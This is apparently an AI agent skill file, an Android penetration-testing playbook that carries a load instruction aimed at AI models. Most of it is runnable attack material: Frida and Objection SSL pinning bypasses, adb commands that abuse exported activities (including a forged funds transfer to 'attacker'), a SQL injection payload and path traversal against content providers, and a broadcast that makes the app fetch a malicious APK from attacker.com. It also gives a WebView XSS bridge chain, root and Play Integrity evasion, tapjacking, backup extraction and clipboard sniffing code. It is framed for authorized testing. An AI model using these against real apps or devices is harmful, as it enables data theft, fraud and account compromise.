| name | android-pentesting-tricks |
| description | Android pentesting playbook. Use when testing Android applications for SSL pinning bypass, exported component abuse, WebView vulnerabilities, intent redirection, root detection bypass, tapjacking, and backup extraction during authorized mobile security assessments. |
SKILL: Android Pentesting Tricks — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert Android application security testing techniques. Covers SSL pinning bypass (Frida/Objection/LSPosed), component exposure, WebView exploitation, intent redirection, root detection bypass, and Play Integrity evasion. Base models miss Frida hook specifics and multi-layer bypass chains.
0. RELATED ROUTING
Before going deep, consider loading:
Advanced Reference
Also load FRIDA_SCRIPTS.md when you need:
- Ready-to-use Frida script templates for common Android testing tasks
- Detailed hook points for OkHttp, Retrofit, Volley, WebView
- Root detection bypass script collection
1. SSL PINNING BYPASS
1.1 Frida Universal Bypass
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64"
adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"
frida -U -l ssl_pinning_bypass.js -f com.target.app --no-pause
| Hook Point | Library/Class | Coverage |
|---|
X509TrustManager.checkServerTrusted | Android SDK | All standard HTTPS |
OkHttpClient.Builder.sslSocketFactory | OkHttp 3.x/4.x | Square OkHttp |
CertificatePinner.check | OkHttp 3.x/4.x | OkHttp pinning |
HttpsURLConnection.setSSLSocketFactory | Android SDK | Legacy HTTPS |
SSLContext.init | Android SDK | Custom SSL contexts |
WebViewClient.onReceivedSslError | WebView | WebView SSL errors |
TrustManagerFactory.getTrustManagers | Android SDK | Factory-created TMs |
1.2 Objection (Quick Method)
objection -g com.target.app explore
android sslpinning disable
1.3 Network Security Config (Debug Builds)
If you can modify the APK or it's a debug build:
<network-security-config>
<debug-overrides>
<trust-anchors>
<certificates src="user" />
</trust-anchors>
</debug-overrides>
</network-security-config>
1.4 Magisk Module Approach
| Module | Method | Scope |
|---|
| LSPosed + TrustMeAlready | Hooks system-wide TrustManager | All apps |
| LSPosed + SSLUnpinning | Targeted SSL bypass | Per-app |
| MagiskTrustUserCerts | Moves user CA to system store | All apps trusting system CAs |
| ConscryptTrustUserCerts | Patches Conscrypt | Newer Android (7+) |
2. COMPONENT EXPOSURE
2.1 Exported Activities
aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true"
adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DeepLinkActivity \
-d "target://callback?token=attacker_token"
adb shell am start -n com.target.app/.TransferActivity \
--es "amount" "99999" --es "recipient" "attacker"
2.2 Content Providers
adb shell content query --uri content://com.target.app.provider/users
adb shell content query --uri "content://com.target.app.provider/users" \
--where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"
adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"
| Provider Type | Attack Vector | Impact |
|---|
| Database-backed | SQL injection via query() projection/selection | Data leak, auth bypass |
| File-backed | Path traversal via URI | Read arbitrary files |
| Parcelable | Type confusion in custom Parcelable | Code execution |
2.3 Broadcast Receivers
adb shell am broadcast -a com.target.app.ACTION_UPDATE \
--es "url" "http://attacker.com/malicious.apk"
2.4 Exported Services
adb shell am startservice -n com.target.app/.BackgroundService \
--es "command" "exfiltrate"
adb shell dumpsys activity services | grep com.target
3. WEBVIEW VULNERABILITIES
3.1 JavaScript Interface RCE (Pre-API 17)
webView.addJavascriptInterface(new JSInterface(), "android");
3.2 Modern WebView Attacks
| Vulnerability | Condition | Exploit |
|---|
setJavaScriptEnabled(true) + untrusted content | JS enabled + attacker controls loaded URL | XSS → bridge access |
setAllowFileAccessFromFileURLs(true) | file:// can read other file:// | Load file:///data/data/com.target/... |
setAllowUniversalAccessFromFileURLs(true) | file:// can access any origin | Exfiltrate via XHR to attacker |
loadUrl(user_controlled) | User input in loadUrl | javascript: scheme or file:// |
shouldOverrideUrlLoading bypass | Incomplete URL validation | Redirect to attacker-controlled page |
evaluateJavascript with tainted data | User data in JS execution | XSS in WebView context |
3.3 Deep Link to WebView Chain
1. Attacker crafts deep link: target://webview?url=https://attacker.com/xss.html
2. App opens WebView with attacker URL
3. XSS in WebView calls JavaScript bridge: android.sensitiveMethod()
4. Bridge executes in app context with app's permissions
4. INTENT REDIRECTION
Exported activity receives an Intent and starts another (internal) activity using data from the received Intent.
Intent received = getIntent();
Intent redirect = (Intent) received.getParcelableExtra("next_intent");
startActivity(redirect);
adb shell am start -n com.target.app/.ExportedActivity \
--es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"
| Pattern | Indicator | Risk |
|---|
getParcelableExtra → startActivity | Intent-in-Intent | Start non-exported activities |
getStringExtra("url") → startActivity(Intent.ACTION_VIEW) | URL forwarding | Open arbitrary URLs |
getStringExtra("class") → Class.forName → startActivity | Dynamic class loading | Start any activity by name |
5. ROOT DETECTION BYPASS
5.1 Common Root Detection Checks
| Check | What It Detects | Frida Bypass |
|---|
su binary exists | /system/xbin/su, /sbin/su | Hook File.exists() → return false |
| Build tags contain "test-keys" | Build.TAGS | Hook Build.TAGS → return "release-keys" |
| Magisk Manager installed | Package name check | Hook PackageManager.getPackageInfo |
| Superuser.apk present | Su management app | Hook File.exists() |
| RootBeer library | Multi-check root detection | Hook all RootBeer check methods |
| SafetyNet/Play Integrity | Server-side attestation | Requires Magisk DenyList + module |
| Abnormal system properties | ro.debuggable=1, etc. | Hook SystemProperties.get |
5.2 Magisk DenyList (Previously MagiskHide)
6. PLAY INTEGRITY / SAFETYNET BYPASS
| Level | What It Checks | Bypass Difficulty |
|---|
| Basic Integrity | Not rooted, not emulator | Easy (Magisk + DenyList) |
| Device Integrity | Bootloader locked, verified boot | Hard (requires locked bootloader) |
| Strong Integrity | Hardware-backed attestation | Very hard (hardware TEE) |
Techniques:
- Magisk with Zygisk enabled + DenyList for target app
- Play Integrity Fix (PIF) Magisk module: spoofs device fingerprint
- Shamiko module: hides root from specific apps
- Custom ROM with locked bootloader (Pixel-specific tricks)
7. TAPJACKING (OVERLAY ATTACKS)
<activity android:name=".OverlayActivity"
android:theme="@style/TransparentTheme"
android:excludeFromRecents="true">
</activity>
| Android Version | Protection | Bypass |
|---|
| Pre-6.0 | None | Full overlay |
| 6.0–11 | filterTouchesWhenObscured (opt-in) | Apps not using it are vulnerable |
| 12+ | Untrusted touches blocked for overlay windows | Partial overlays, timing-based |
8. BACKUP EXTRACTION
aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup
adb backup -f backup.ab -apk com.target.app
dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
tar xf backup.tar
find com.target.app -name "*.db" -o -name "*.xml" -o -name "*.json"
9. ADDITIONAL TRICKS
9.1 Debuggable App Exploitation
adb shell run-as com.target.app
cat /data/data/com.target.app/shared_prefs/*.xml
9.2 Drozer (Component Testing Framework)
dz> run app.package.attacksurface com.target.app
dz> run app.provider.query content://com.target.app.provider/users
dz> run scanner.provider.injection -a com.target.app
9.3 Clipboard Sniffing
ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
ClipData data = cm.getPrimaryClip();
});
10. ANDROID PENTESTING DECISION TREE
Testing Android application
│
├── Can intercept HTTPS traffic?
│ ├── No → SSL pinning in place
│ │ ├── Frida available? → universal SSL bypass script (§1.1)
│ │ ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4)
│ │ ├── Debug build? → Network Security Config (§1.3)
│ │ └── None above? → manual decompile + patch + repackage
│ └── Yes → proceed to traffic analysis
│
├── Exported components found?
│ ├── Exported Activities → test direct launch, deeplink abuse (§2.1)
│ ├── Content Providers → SQLi, path traversal (§2.2)
│ ├── Broadcast Receivers → crafted intent injection (§2.3)
│ └── Services → unauthorized service binding (§2.4)
│
├── WebView present?
│ ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1)
│ ├── File access enabled? → file:// scheme abuse (§3.2)
│ └── Deep link → WebView? → URL injection chain (§3.3)
│
├── Intent handling found?
│ └── Intent-in-Intent pattern? → redirect to internal activity (§4)
│
├── Root detection blocking testing?
│ ├── Client-side checks only? → Frida hook bypass (§5.1)
│ ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6)
│ └── Custom obfuscated checks? → reverse engineer + targeted hooks
│
├── Sensitive data storage?
│ ├── allowBackup=true? → ADB backup extraction (§8)
│ ├── Debuggable? → run-as for direct data access (§9.1)
│ └── SharedPreferences → check for plaintext tokens/credentials
│
└── UI-based attacks applicable?
└── Overlay possible? → tapjacking (§7)